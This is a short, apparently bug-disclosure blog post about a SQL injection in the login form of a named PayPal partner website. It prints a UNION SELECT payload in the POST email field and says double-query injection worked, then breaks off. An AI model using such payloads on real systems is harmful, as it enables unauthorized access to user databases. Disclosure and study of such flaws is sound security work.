Paypal Partner SQL Injection

One of the Paypal Partner websites http://ppinvoice.com/ was suffering from a POST SQL injection. Union injection was impossible in here.

LoginForm[email]=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3

As we cannot continue with the above error, double query injection works perfect.
(more…)